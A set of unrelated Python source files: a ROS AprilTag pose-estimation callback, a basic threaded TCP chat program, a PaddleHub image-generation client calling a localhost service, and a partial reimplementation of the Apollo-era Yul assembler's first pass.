rospy.logwarn("Failed to transform frame '" + tag_array.header.frame_id + "'... Discarding whole message!")
return
T = tf.transformations.translation_matrix(cam_trans)
R = tf.transformations.quaternion_matrix(cam_rot)
# From map to camera
m_T_c = tf.transformations.concatenate_matrices(T, R)
for det in tag_array.detections:
tag_frame = 'tag' + str(det.id[0])
# Get the transform from the tag frame to the base_link frame
try:
(trans, rot) = tf_listener.lookupTransform(
tag_frame, 'base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException,
tf.ExtrapolationException) as e:
rospy.logwarn("Failed to transform frame '" + tag_frame + "'... Discarding data.")
rospy.logerr(e)
continue
T = tf.transformations.translation_matrix(trans)
R = tf.transformations.quaternion_matrix(rot)
# From tag to base link
t_T_b = tf.transformations.concatenate_matrices(T, R)
trans = [det.pose.pose.pose.position.x,
det.pose.pose.pose.position.y,
det.pose.pose.pose.position.z]
rot = [det.pose.pose.pose.orientation.x,
det.pose.pose.pose.orientation.y,
det.pose.pose.pose.orientation.z,
det.pose.pose.pose.orientation.w]
T = tf.transformations.translation_matrix(trans)
R = tf.transformations.quaternion_matrix(rot)
c_T_t = tf.transformations.concatenate_matrices(T, R)
# We now have the transform from the tag frame to the base link
# frame, the transform from the camera frame to the map frame, and
# the pose of the tag in the camera frame
# Multiplying these together should give the correct transform
c_T_b = numpy.dot(c_T_t, t_T_b)
m_T_b = numpy.dot(m_T_c, c_T_b)
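        # Reading the chain right to left: t_T_b maps base_link into the tag frame,
        # c_T_t places the tag in the camera frame, and m_T_c places the camera in the
        # map frame, so m_T_b = m_T_c * c_T_t * t_T_b is the base_link pose in the map frame.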
trans = tf.transformations.translation_from_matrix(m_T_b)
rot = tf.transformations.quaternion_from_matrix(m_T_b)
pose = PoseWithCovarianceStamped()
pose.pose.pose.position.x = trans[0]
pose.pose.pose.position.y = trans[1]
pose.pose.pose.position.z = trans[2]
pose.pose.pose.orientation.x = rot[0]
pose.pose.pose.orientation.y = rot[1]
pose.pose.pose.orientation.z = rot[2]
pose.pose.pose.orientation.w = rot[3]
z_dist = det.pose.pose.pose.position.z
cov = 3e-2 + z_dist * 3e-3
pose.pose.covariance = [cov , 0, 0, 0, 0, 0,
0 , cov , 0, 0, 0, 0,
0 , 0, cov , 0, 0, 0,
0 , 0, 0, 0, 0, 0,
0 , 0, 0, 0, 0, 0,
0 , 0, 0, 0, 0, 1e-1]
pose.header.stamp = tag_array.header.stamp
pose.header.frame_id = 'map'
if pose.pose.pose.position.z > 0.1 or pose.pose.pose.position.z < -0.1:
return
pub.publish(pose)
def main():
global pub
pub = rospy.Publisher(
"yeetbot_pose_estimate", PoseWithCovarianceStamped, queue_size=20)
rospy.Subscriber(
'tag_detections', AprilTagDetectionArray, tag_detection_cb)
rospy.spin()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
the-stack_0_25988
|
import socket
import threading
ENCODING = 'utf-8'
# A simple messenger has two components, a sender and a receiver.
# These two components should run on separate threads.
# To implement them we will have two classes, Receiver and Sender; both extend threading.Thread.
# The receiver is the component responsible for receiving messages: it binds a server socket,
# listens for connections and receives the data the client is sending.
class Receiver(threading.Thread):
def __init__(self, my_host, my_port):
threading.Thread.__init__(self, name="messenger_receiver")
self.host = my_host
self.port = my_port
def listen(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Create a new socket using the AF_INET address family, and SOCK_STREAM socket type
sock.bind((self.host, self.port))
sock.listen(10)
while True:
connection, client_address = sock.accept()
try:
full_message = ""
while True:
data = connection.recv(16)
full_message = full_message + data.decode(ENCODING)
if not data:
print("{}: {}".format(client_address, full_message.strip()))
break
finally:
#connection.shutdown(2)
connection.close()
def run(self):
self.listen()
# The sender is the component responsible for sending messages: every time the user wants to
# send one, it opens a client socket, connects to the recipient, sends the message and closes the socket.
class Sender(threading.Thread):
def __init__(self, my_friends_host, my_friends_port):
threading.Thread.__init__(self, name="messenger_sender")
self.host = my_friends_host
self.port = my_friends_port
def run(self):
while True:
message = input("=>") #collect message from terminal input
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.port)) #sender socket connects rather than binds and listen
s.sendall(message.encode(ENCODING))
s.shutdown(2)
s.close()
def main():
my_host = input("which is my host? ")
my_port = int(input("which is my port? "))
receiver = Receiver(my_host, my_port)
my_friends_host = input("what is your friend's host? ")
my_friends_port = int(input("what is your friend's port? "))
sender = Sender(my_friends_host, my_friends_port)
    # Thread.start() returns None, so just start both threads rather than collecting return values.
    receiver.start()
    sender.start()
if __name__ == '__main__':
main()
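# A hypothetical two-terminal session (values illustrative only):
#   terminal A answers: my host 127.0.0.1, my port 5000, friend's host 127.0.0.1, friend's port 5001
#   terminal B answers: my host 127.0.0.1, my port 5001, friend's host 127.0.0.1, friend's port 5000
# Each process then listens on its own port while sending every typed line to the other
# through a short-lived client socket.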
|
the-stack_0_25991
|
# coding: utf8
import requests
import json
import base64
import os
if __name__ == "__main__":
    # Specify the image files to use and build a list of tuples [("image", img_1), ("image", img_2), ...]
file_list = ["../../../../docs/imgs/man.png"]
files = [("image", (open(item, "rb"))) for item in file_list]
    # Specify the corresponding info and style for each image
data = {"info": ["Male,Black_Hair"], "style": ["Bald"]}
    # Use the stgan_celeba module for image generation and send a POST request
url = "http://127.0.0.1:8866/predict/image/stgan_celeba"
r = requests.post(url=url, data=data, files=files)
print(r.text)
results = eval(r.json()["results"])
    # Save the generated images to the output folder and print the model output
if not os.path.exists("stgan_output"):
os.mkdir("stgan_output")
for item in results:
output_path = os.path.join("stgan_output", item["path"].split("/")[-1])
with open(output_path, "wb") as fp:
fp.write(base64.b64decode(item["base64"].split(',')[-1]))
item.pop("base64")
print(json.dumps(results, indent=4, ensure_ascii=False))
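# Assumed prerequisite (not shown here): the stgan_celeba module is already being served,
# typically via something like `hub serving start -m stgan_celeba`, so that the
# /predict/image/stgan_celeba endpoint above is reachable on port 8866.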
|
the-stack_0_25996
|
import copy
from yul_system.types import Bit, SwitchBit, FieldCodBit, HealthBit, LocStateBit, \
MemType, Symbol, ALPHABET, ONES
class POPO:
def __init__(self, health=0, card=''):
self.health = health
self.card = card
vert_format = ord(self.card[7])
if vert_format >= 0x50:
vert_format -= 0x20
self.seq_break = True
else:
self.seq_break = False
if vert_format >= 0x40:
self.marked = True
else:
self.marked = False
def mark(self):
if not self.marked:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format + 0x10) + self.card[8:]
self.marked = True
def unmark(self):
if self.marked:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format - 0x10) + self.card[8:]
self.marked = False
def set_seq_break(self):
if not self.seq_break:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format + 0x20) + self.card[8:]
self.seq_break = True
def clear_seq_break(self):
if self.seq_break:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format - 0x20) + self.card[8:]
self.seq_break = False
def cardno_wd(self):
return self.card[0:8]
def loc_field(self):
return self.card[8:16]
def op_field(self):
return self.card[16:24]
def address_1(self):
return self.card[24:32]
def address_2(self):
return self.card[32:40]
def date_word(self):
return self.card[64:72]
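    # Column layout implied by the accessors above (0-based slices of the 80-column card):
    #   card[0]     type/flag column ('L' log, 'R'/'A'/'P' remarks, '=' acceptor, ...)
    #   card[1:7]   card number (or 'SEQBRK')
    #   card[7]     vertical format plus the marked / sequence-break flag bits
    #   card[8:16]  location field
    #   card[16:24] operation field
    #   card[24:32] first address word
    #   card[32:40] second address word
    #   card[64:72] date word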
class BadMemory(Exception):
pass
class IllegalOp(Exception):
pass
class Disaster(Exception):
pass
class BadMerge(Exception):
pass
class Pass1:
def __init__(self, mon, yul):
self._mon = mon
self._yul = yul
self._real_cdno = 0
self._last_cdno = 0
self._field_cod = [None, None]
self._end_of = POPO(health=0, card='⌑999999Q' + '%-72s' % yul.old_line)
self._early = True
self._op_found = None
self._send_endo = False
self._renum_disabled = False
self._restart_log = False
self._log_renum = False
self._loc_state = 0
self._renumber = 0
self._sypt = None
self._head = ' '
self._end_yul = 'END YUL PASS 1'
self._xforms = [
0x4689A5318F,
0x47BCDF42E2,
0x47BCDF42E2,
0xB7BCD642B4,
0xB7BCD742B4,
0x07BCDF62FF,
0x37BCDF42B7,
0x37BCDF42B7,
0x1BBEEFB2BB,
0x3CECEFC2EC,
0x3DEEDFD2ED,
0x1BBEEFB2BB,
0x3CECEFC2EC,
0x3DEEDFD2ED,
0x1EEEEFE2EE,
0x1FFFFFF2FF,
]
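        # Each _xforms entry packs a symbol-health transform row as hex nibbles; callers
        # select a column with shifts such as (sym_xform >> 8*4) & 0xF (see location and
        # er_loc_sym), so the nibble position picks the new health for a given outcome
        # (normal definition, oversize, wrong memory type, conflict, ...).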
def post_spec(self):
if self._yul.switch & SwitchBit.SUBROUTINE:
self._loc_ctr = self.subr_loc
else:
self._loc_ctr = ONES
return self.get_real()
def get_real(self):
# Get real is normally the chief node of pass 1. Occasionally merge control procedures take
# over, accepting or rejecting tape cards.
try:
while True:
# Get a card and branch on no end of file.
card = self.get_card()
if card is None:
self._real = self._end_of
return self.tp_runout()
if self._yul.switch & SwitchBit.MERGE_MODE:
if not self._yul.switch & SwitchBit.TAPE_KEPT:
self._tape = self.get_tape()
if self._tape is None:
# FIXME: Clean up and exit pass 1
return
self.modif_chk()
except BadMerge:
return self.bad_merge()
def tp_runout(self):
if not self._yul.switch & SwitchBit.MERGE_MODE:
self.proc_real()
if self._yul.switch & SwitchBit.TAPE_KEPT:
self.proc_tape()
self._tape = self.get_tape()
while self._tape is not None:
self.proc_tape()
self._tape = self.get_tape()
return self.end_pass_1()
def end_pass_1(self):
if self._yul.popos[-1].health != 0:
print(self._yul.popos[-1].card)
raise Disaster()
if self._yul.switch & SwitchBit.FREEZE_P1:
self.send_popo(self._end_of)
# FIXME: play with number of copies?
bad1_bits = (SwitchBit.REPRINT |
SwitchBit.SUPPRESS_INACTIVE | SwitchBit.SUPPRESS_SYMBOL | SwitchBit.SUPPRESS_OCTAL |
SwitchBit.CONDISH_INACTIVE | SwitchBit.CONDISH_SYMBOL | SwitchBit.CONDISH_OCTAL)
# Maybe set reprint flag for passes 1.5, 3.
self._yul.switch &= ~SwitchBit.REPRINT_PASS1P5
if self._yul.switch & SwitchBit.REPRINT:
self._yul.switch |= SwitchBit.REPRINT_PASS1P5
# Branch on no merge error.
if self._end_yul.endswith('≠'):
# Bar YULPROGS writes, bar some printing.
self._yul.switch |= bad1_bits
self._mon.mon_typer(self._end_yul)
# Clear out substrand (paragraph) table
self._yul.substrab = [False]*256
# FIXME: do segment things
comp_pass2 = self._mon.phi_load(self._yul.comp_name + '.PASS2', self._yul, self.adr_limit, self.m_typ_tab)
if comp_pass2 is None:
self._yul.typ_abort()
return comp_pass2.pass_1p5()
def get_card(self):
# Subroutine in pass 1 to get a real card. Normally performs card number checking. Response
# to Yul director or monitor card (end of file situations) is to peek only.
# Peek at card.
card = self._mon.mon_peek()
# Branch if not any kind of end of file.
if card[0] in 'Y*':
if card[0] == 'Y':
# Show that another task follows.
self._yul.switch |= SwitchBit.ANOTHER_TASK
# End of file exit after peek at mon card.
self._real_cdno = Bit.BIT6
return None
# See no input if reprinting.
if self._yul.switch & SwitchBit.REPRINT:
return None
card = self._mon.mon_read()
self._real = POPO(health=0, card=card)
if self._real.card[7] == ' ':
# Insert upspace 1 for blank.
self._real.card = self._real.card[:7] + '1' + self._real.card[8:]
elif self._real.card[7] == '-':
# Assume minus is a fat-fingering of 2.
self._real.card = self._real.card[:7] + '2' + self._real.card[8:]
elif not self._real.card[7].isnumeric():
# Insert form-skip for non-numeric.
self._real.card = self._real.card[:7] + '8' + self._real.card[8:]
# Mark all cards entering during merging.
if self._yul.switch & SwitchBit.MERGE_MODE:
self._real.mark()
# Blot out undesirable column 1 contents.
if not (self._real.card[0].isalnum() or self._real.card[0] in '= '):
self._real.card = '■' + self._real.card[1:]
self._real.health = 0
# Card number sequence checking and sequence break analysis.
# Isolate card no. for seq. brk. analysis.
card_no = self._real.card[1:7]
# Substitute zero for blank.
card_no = card_no.replace(' ', '0')
seq_break = False
test_col1 = True
if not card_no.isnumeric():
# "SEQBRK" is only non-numeric allowed.
if card_no == 'SEQBRK':
seq_break = True
# Allow for "LOG" in col 2-7 of acceptor.
elif self._real.card[0] == '=':
seq_break = True
# Show illegal number field by zero.
else:
card_no = '000000'
# Card number 999999 is a sequence break.
if card_no == '999999':
seq_break = True
# Do not test column 1 of right print.
if self._real.card[7] != '9':
# A log card is an automatic sequence break.
if self._real.card[0] == 'L':
# FIXME: Remove confusing info from log card?
# self._real.card = self._real.card[0] + ' ' + self._real.card[7:]
seq_break = True
# Branch if not TINS (Tuck In New Section)... which is an incipient log card.
if self._real.card[0] == 'T':
seq_break = True
# Op code "MODIFY" is automatic seq. brk.
if self._real.card[0] == ' ' and self._real.card[16:22] == 'MODIFY':
seq_break = True
if seq_break:
# Insert sequence break bit in card.
self._real.set_seq_break()
# Set up criterion after sequence break.
self._real_cdno = Bit.BIT6
return self._real.card
real_card_no = int(card_no, 10)
if real_card_no <= (self._real_cdno & 0xFFFFFFFFF):
# Disorder
self._real.health |= Bit.BIT7
# Keep normal form of card number on tape.
self._real.card = self._real.card[0] + card_no + self._real.card[7:]
self._real_cdno = real_card_no
return self._real.card
def send_popo(self, popo):
if self._renum_disabled:
# Restore renumbering test to normal.
self._renum_disabled = False
return self.move_popo(popo)
# Branch if renumbering is on.
if not (self._yul.switch & SwitchBit.RENUMBER):
return self.move_popo(popo)
# Go to renumber most card types.
card_type = popo.health & HealthBit.CARD_TYPE_MASK
if card_type >= HealthBit.CARD_TYPE_RIGHTP:
return self.rnum_card(popo)
# Br if merge control or merge error card.
if card_type != HealthBit.CARD_TYPE_REMARK:
# Branch if merge control card.
if HealthBit.CARD_TYPE_CARDNO > card_type:
# Shut off renumbering on bad merge.
self._yul.switch &= ~SwitchBit.RENUMBER
return self.move_popo(popo)
# Branch to renumber non-log remarks.
if popo.card[0] != 'L':
return self.rnum_card(popo)
# Restart number sequence after log etc.
self._field_cod[1] = 0
self._renumber = 0
if self._restart_log:
self._yul.switch &= ~SwitchBit.RENUMBER
return self.move_popo(popo)
def rnum_card(self, popo):
# Wipe out obsolete sequence error bit.
popo.health &= ~Bit.BIT7
if self._renumber > 999898:
# Generate seqbreak after card 9998.98.
popo.set_seq_break()
popo.card = popo.card[0] + 'SEQBRK' + popo.card[7:]
self._renumber = 0
self._field_cod[1] = 0
return self.move_popo(popo)
self._renumber += 100
# Erase old sequence break flag.
popo.clear_seq_break()
# Plant it and go to move card.
self._field_cod[1] = self._renumber
popo.card = popo.card[0] + ('%06d' % self._renumber) + popo.card[7:]
return self.move_popo(popo)
def move_popo(self, popo):
self._yul.popos.append(popo)
def modif_chk(self):
# See if operation code of real card is "MODIFY". But don't be fooled by a remarks card.
        if self._real.card[16:22] == 'MODIFY' and self._real.card[0] == ' ' and (ord(self._real.card[7]) & 0xF) != 9:
# Indicate card type.
self._real.health |= HealthBit.CARD_TYPE_MODIFY
if not self._yul.switch & SwitchBit.MERGE_MODE:
# When in main part of new program send the "MODIFY" card, create and send the
# "END OF" card made up by pass 0, and process the latter.
self.proc_real()
self._real = self._end_of
self.proc_real()
return
# Set up search for "END OF" card.
            while self._tape.card[:8] != self._end_of.card[:8]:
self.proc_tape()
# Get another tape card if not found yet.
self._tape = self.get_tape()
if self._tape is None:
raise Disaster()
# Process "MODIFY" just before "END OF".
self.proc_real()
return self.proc_tape()
if not self._yul.switch & SwitchBit.MERGE_MODE:
# Process real card with no further ado.
return self.proc_real()
return self.comp_cdns()
def comp_cdns(self):
# COMP CDNS is the heart of the merging process. If the tape card is chosen,
# it cannot be an "END OF" card.
while True:
if self._real_cdno <= self._tape_cdno:
break
            # Since the last card of a tape file is numbered 999999, we guarantee no EOF.
self.proc_tape()
self._tape = self.get_tape()
return self.keep_tape()
def keep_tape(self):
# Indicate that a tape card is waiting.
self._yul.switch |= SwitchBit.TAPE_KEPT
# Right print can't be merge control card.
if (ord(self._real.card[7]) & 0xF) == 9:
return self.not_mccd()
# Branch if not an acceptor card.
if self._real.card[0] != '=':
return self.not_acept()
# Reject if disordered card number.
self._real.health |= HealthBit.CARD_TYPE_ACCEPT
if (self._real.health >> 36) & 0o77:
raise BadMerge()
# Analyze card number field.
common, value = self.anal_subf(self._real.cardno_wd()[1:7], self._real)
common = common.strip()
# Disable complaint about "D" error.
self._real.health &= ~Bit.BIT9
# Branch if not accepting a log card.
merj_rtrn = False
if common == "LOG":
# Branch if dashes should be put in date.
if self._real.card[67:69] != ' ' or self._real.card[70:72] != ' ':
self._real.card = self._real.card[:69] + '-' + self._real.card[70:72] + '-' + self._real.card[73:]
merj_rtrn = True
while True:
# Illegal to accept an "END OF" card thus.
if self._tape.cardno_wd() == self._end_of.cardno_wd():
raise BadMerge()
if ((self._tape_cdno != self._real_cdno) or # Demand equality of formal card number.
(merj_rtrn and self._tape.card[0] != 'L') or # Branch if tape card should be log.
(self._tape.card[8:] != self._real.card[8:]) or # Branch if difference in cols. 9-80.
(self._tape.card[0] == 'L' and not merj_rtrn)): # Branch if log but should not be.
# Accept a card and get another.
self.proc_tape()
self._tape = self.get_tape()
continue
break
# Mark card as accepted.
self._tape.mark()
# Send acceptor card.
self.send_popo(self._real)
# Process accepted card, get another real.
self.proc_tape()
# Procedure to detect and process requests for changing or correcting card numbers, using the "CARDNO" code. The
# "CARDNS" code is similar, but starts renumbering from that value until the next log card. "PRESERVE CDNS"
# turns off renumbering. If "RENUMBER" subdirector was used, it resumes after the reign of any "CARDNS" code.
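    # A hedged sketch of the card forms handled below (values illustrative only):
    #   op "CARDNO", location "CHANGE",  address "TO 123.45"  - renumber the matched good-numbered card
    #   op "CARDNO", location "CORRECT", address "TO 123.45"  - renumber a card located by its bad number
    #   op "CARDNS", location anything but "PRESERVE"         - start renumbering until the next log card
    #   op "CARDNS", location "PRESERVE"                      - "PRESERVE CARDNS", turn renumbering off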
def not_acept(self):
# Branch if cannot be merge control card.
if self._real.card[0] != ' ':
return self.not_mccd()
# Branch if not a "CARDNS" code.
if self._real.card[17:23] != 'CARDNS':
return self.cardno_cq()
if self._real.loc_field() != 'PRESERVE':
return self.cardno_cq(cardns=True)
self._real.health |= HealthBit.CARD_TYPE_CARDNO
        if (not self._real.address_1().isspace()) or (not self._real.address_2().isspace()):
# Cuss bad address field.
self._real.health |= Bit.BIT9
raise BadMerge()
# Reject "PRESERVE CARDNS" for any defect.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
raise BadMerge()
self.find_cdno()
# Exit quietly if renumbering already off.
if self._yul.switch <= Bit.BIT1:
self.send_popo(self._real)
return self.proc_tape()
# Branch if preservation causes disorder.
if self._real_cdno <= self._field_cod[1]:
self._real.health |= Bit.BIT7
raise BadMerge()
self._yul.switch &= ~SwitchBit.RENUMBER
# Exit if renumbering was in log sec only.
if not self._restart_log:
# Modify log card routine to start renum.
self._log_renum = True
self.send_popo(self._real)
return self.proc_tape()
def cardno_cq(self, cardns=False):
# Branch if not a "CARDNO" code.
if (not cardns) and (self._real.card[17:23] != 'CARDNO'):
return self.delete_cq()
# Analyze location field.
common, value = self.anal_subf(self._real.loc_field(), self._real)
common = common.strip()
if common == 'CORRECT':
# Set up search for bad card number if "CORRECT" but never cuss this card no.
self._yul.switch |= SwitchBit.CORRECT
self._real.health = 0
elif common == 'CHANGE':
# Seek OK card number if "CHANGE".
self._yul.switch &= ~SwitchBit.CORRECT
else:
# Cuss bad location field.
self._real.health |= Bit.BIT8
# Note type, analyze address field.
self._real.health |= HealthBit.CARD_TYPE_CARDNO
cn_limit = self.mccd_adrf()
if self._field_cod[0] != Bit.BIT2:
# Cuss bad address field.
self._real.health |= Bit.BIT9
raise BadMerge()
# Reject "CARDNO" for any sin.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
raise BadMerge()
# Set up card whose number is to be chgd.
self.find_cdno()
# Change external card number.
self._tape.card = self._tape.card[0] + ('%06d' % cn_limit) + self._tape.card[7:]
self._tape.mark()
# On log card, change is superficial only.
if self._tape.card[0] == 'L':
if self._tape.card[1:7] != '000000':
return self.send_ccno()
# ..though SQB setting is blanked.
self._tape.card = self._tape.card[0] + ' ' + self._tape.card[7:]
return self.send_ccno()
# Clear possible sequence break bit.
self._tape.clear_seq_break()
# Change internal card number.
self._tape_cdno = cn_limit
# If seq. br., set external card number to SEQBRK and set bit 43.
if self._tape_cdno == Bit.BIT6:
self._tape.card = self._tape.card[0] + 'SEQBRK' + self._tape.card[7:]
            self._tape.set_seq_break()
return self.send_ccno()
def send_ccno(self):
# Send "CARDNO", "CARDNS", or "DELETE".
self.send_popo(self._real)
# Branch if a section was renumbered.
if self._real.card[17:23] == 'CARDNO':
# New number is criterion for next real.
self._real_cdno = self._tape_cdno
# Process accepted card, get another real.
return self.proc_tape()
# If renumber is now under way, compare new number with last card's renumber.
if self._yul.switch & SwitchBit.RENUMBER:
self._last_cdno = self._field_cod[1]
# Process card with renumbering disabled.
self._renum_disabled = True
self.proc_tape()
self._renumber = self._last_cdno
# For CARDNS, keep old sequence criterion.
self._last_cdno = self._real_cdno
# Exit if renumbering is now under way.
if self._yul.switch & SwitchBit.RENUMBER:
return
# Call for partial renumbering.
self._yul.switch |= SwitchBit.RENUMBER
# Make it stop after first log card.
self._restart_log = True
return
    # Procedure to detect and process "DELETE" cards.
def delete_cq(self):
# Branch if not a "CARDNO" code.
if self._real.card[17:23] != 'DELETE':
return self.insert_cq()
# Branch if location field not "OUTOFSEQ".
if self._real.loc_field() == 'OUTOFSEQ':
# Set up search for bad card number.
self._yul.switch |= SwitchBit.CORRECT
# Never cuss this card number.
self._real.health = 0
else:
# Cuss bad location field.
if not self._real.loc_field().isspace():
self._real.health |= Bit.BIT8
# Set up search for OK card number.
self._yul.switch &= ~SwitchBit.CORRECT
# Analyze address field.
self._real.health |= HealthBit.CARD_TYPE_DELETE
cn_limit = self.mccd_adrf()
# Branch if address field not blank.
if self._field_cod[0] == 0:
# Reject singleton delete for bad card no.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
self._real_cdno = self._last_cdno
raise BadMerge()
# Go find single card to be deleted.
self.find_cdno()
else:
if self._field_cod[0] != Bit.BIT1:
# Cuss bad address field.
self._real.health |= Bit.BIT9
self._real_cdno = self._last_cdno
raise BadMerge()
# Branch if first cardno is not seq break.
if self._real_cdno != Bit.BIT6:
# Cuss if 1st cardn not less than 2nd.
if self._real_cdno >= cn_limit:
self._real.health |= Bit.BIT12
self._real_cdno = self._last_cdno
raise BadMerge()
else:
# Branch if 2nd cardno is not seq break.
if cn_limit == Bit.BIT6:
self._real.health |= Bit.BIT12
self._real_cdno = self._last_cdno
raise BadMerge()
# Reject "DELETE" card for any sin.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
self._real_cdno = self._last_cdno
raise BadMerge()
# Set up card to be deleted.
self.find_cdno()
# Fetch next card to look at number.
while True:
self._tape = self.get_tape()
if cn_limit <= self._tape_cdno:
break
# Second number must match existing one.
if cn_limit != self._tape_cdno:
self._real.health |= Bit.BIT11
self._real_cdno = self._last_cdno
raise BadMerge()
# Send "DELETE" card.
self._real_cdno = self._last_cdno
self.send_popo(self._real)
# Allow deletion of any but "END OF" card.
if self._tape.cardno_wd() == self._end_of.cardno_wd():
# Keep it and maybe insert before it.
self._yul.switch |= SwitchBit.TAPE_KEPT
else:
# End of deletion process.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
# Procedure to detect and process "INSERT" cards.
def insert_cq(self):
if self._real.card[17:23] != 'INSERT':
return self.not_mccd()
# FIXME
pass
# Common procedure when merging is given up for lost for any reason.
def bad_merge(self):
# Send bad merge control card.
self.send_popo(self._real)
# Type most guilty card.
self._real.card = self._real.card[:7] + ' ' + self._real.card[8:]
self._mon.mon_typer(self._real.card)
# Announce rejection of task.
self._real = POPO(health=HealthBit.CARD_TYPE_ENDERR,
card='E■■■■■■ATHIS TASK IS REJECTED. RESUBMIT CORRECTED DECK WITH SAME DIRECTOR CARD. ')
self.send_popo(self._real)
# Loop to accept remaining tape cards.
while self._tape is not None:
self.proc_tape()
self._tape = self.get_tape()
        # See whether to throw out remaining real cards, being careful not to announce
# same if there are none.
self.get_card()
if self._real is not None:
# FIXME: HEAVE HO
pass
self._end_yul += ' ≠'
return self.end_pass_1()
# Subroutine in pass 1 to find the tape card to which a merge control card refers.
# Exits to BAD MERGE if no exact card number match is found before a sequence break.
def find_cdno(self):
while True:
# Branch if tape card not sequence break.
if self._tape_cdno == Bit.BIT6:
# Always illegal to find an "END OF" card. Branch if real card not sequence break.
if self._tape.cardno_wd() == self._end_of.cardno_wd() or self._tape_cdno != self._real_cdno:
# Cuss failure to find match.
self._real.health |= Bit.BIT10
raise BadMerge()
# Branch if not seeking bad card number.
if not self._yul.switch & SwitchBit.CORRECT:
return
# Cuss illegal location field.
self._real.health |= Bit.BIT8
raise BadMerge()
# Branch if no match yet.
if self._tape_cdno == self._real_cdno:
# Branch if looking for bad card number and desired bad card no. found.
if self._yul.switch & SwitchBit.CORRECT:
if self._tape.health != 0:
return
# Bad card number implies no match.
elif self._tape.health == 0:
return
# Process a tape card and look again
self.proc_tape()
self._tape = self.get_tape()
# We get to NOT MCCD for every real card that is not a merge control card.
def not_mccd(self):
if self._real.health > 0:
# Card no. error in revision cards is bad.
self._real.health |= HealthBit.CARD_TYPE_ENDERR
raise BadMerge()
# Branch if real card precedes tape card.
if self._real_cdno != self._tape_cdno:
return self.proc_real()
# Force same if real card is "TUCK-IN".
if self._real.card[0] == 'T':
self._real.card = 'L' + self._real.card[1:]
return self.proc_real()
# Force same if tape card is "END OF".
if self._tape.cardno_wd() == self._end_of.cardno_wd():
return self.proc_real()
# Otherwise replace tape card with real.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
return self.proc_real()
def proc_real(self):
return self.process(self._real, self._real_cdno)
def proc_tape(self):
# Unkeep and process tape card.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
return self.process(self._tape, self._tape_cdno)
def process(self, popo, cdno):
# Final sequence checking before processing.
if (cdno <= self._last_cdno) and (cdno != Bit.BIT6):
# Indicate card number out of sequence.
popo.health |= Bit.BIT7
else:
# Clear possible error bit, tab to exit.
popo.health &= ~Bit.BIT7
self._last_cdno = cdno & ~Bit.BIT6
if (ord(popo.card[7]) & 0xF) == 9:
popo.health |= HealthBit.CARD_TYPE_RIGHTP
return self.send_popo(popo)
if popo.card[0] == 'R':
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
if popo.card[0] == 'A':
popo.health |= HealthBit.CARD_TYPE_ALIREM
return self.send_popo(popo)
if popo.card[0] == 'P':
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
if popo.card[0] == 'L':
if self._log_renum:
self._log_renum = False
self._yul.switch |= SwitchBit.RENUMBER
# Branch if dashes should be put in date.
if popo.card[67:69] != ' ' or popo.card[70:72] != ' ':
popo.card = popo.card[:69] + '-' + popo.card[70:72] + '-' + popo.card[73:]
# FIXME: Send a dummy acceptor ahead of a marked log card entering as a member of a called subro
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
# Check for "END OF" information from tape or (new program or subro) from pass 0.
if popo.cardno_wd() == self._end_of.cardno_wd():
popo.health |= HealthBit.CARD_TYPE_END_OF
return self.end_of(popo)
op_field = popo.op_field()[1:7]
if self._early:
if op_field == 'MEMORY':
return self.memory(popo)
if op_field == 'SEGNUM':
return self.segnum(popo)
self._early = False
common, value = self.anal_subf(op_field, popo)
operation = common.strip()
try:
if self._field_cod[0] is None:
raise IllegalOp()
elif self._field_cod[0] in (0, FieldCodBit.SYMBOLIC):
if operation != '' and operation[-1] == '*':
popo.health |= HealthBit.ASTERISK
operation = operation[:-1]
if operation in self.op_thrs:
if isinstance(self.op_thrs[operation], int):
opcode = self.op_thrs[operation] & ~Bit.BIT37
if self._op_found is None:
popo.health |= (opcode << 16)
else:
self._op_found(popo, opcode)
popo.health |= HealthBit.CARD_TYPE_INSTR
else:
self.op_thrs[operation](popo)
return
else:
raise IllegalOp()
elif not self._field_cod[0] & FieldCodBit.UNSIGNED:
raise IllegalOp()
else:
popo.health |= (value << self.mod_shift)
if value <= self.max_num_op:
popo.health |= HealthBit.CARD_TYPE_INSTR
else:
raise IllegalOp()
except IllegalOp:
return self.illegop(popo)
return self.inst_dec_oct(popo)
def end_of(self, popo):
if not self._send_endo:
self._send_endo = True
# The subroutines are known.
self._yul.switch |= SwitchBit.KNOW_SUBS
# Prohibit renumbering in subroutines.
self._yul.switch &= ~SwitchBit.RENUMBER
# FIXME: set up first subro
# FIXME: set up next subro
# Exit via SEND POPO unless freezing subs.
if not self._yul.switch & SwitchBit.FREEZE:
return self.send_popo(popo)
def illegop(self, popo):
self._yul.switch &= ~(Bit.BIT25 | Bit.BIT26 | Bit.BIT27)
self._yul.switch |= MemType.FIXED
self._loc_state = 0
self.location(popo, blank=True)
popo.health &= ~HealthBit.CARD_TYPE_MASK
popo.health |= HealthBit.CARD_TYPE_ILLOP
return self.reg_incon(popo, translate_loc=False)
def inst_dec_oct(self, popo):
self._yul.switch &= ~MemType.MEM_MASK
self._yul.switch |= MemType.FIXED
if popo.card[0] == 'J':
# FIXME: handle leftovers
translate_loc = False
else:
translate_loc = True
return self.reg_incon(popo, translate_loc)
def reg_incon(self, popo, translate_loc=True):
if translate_loc:
self._loc_state = 0
self.location(popo)
popo.health |= self._loc_state
return self.send_popo(popo)
def location(self, popo, blank=False):
self._field_cod[1] = None
symbol = None
new_health = 0
# Initialize transform address
sym_xform = self._xforms[0]
if not blank:
# Analyze location field.
common, value = self.anal_subf(popo.loc_field(), popo)
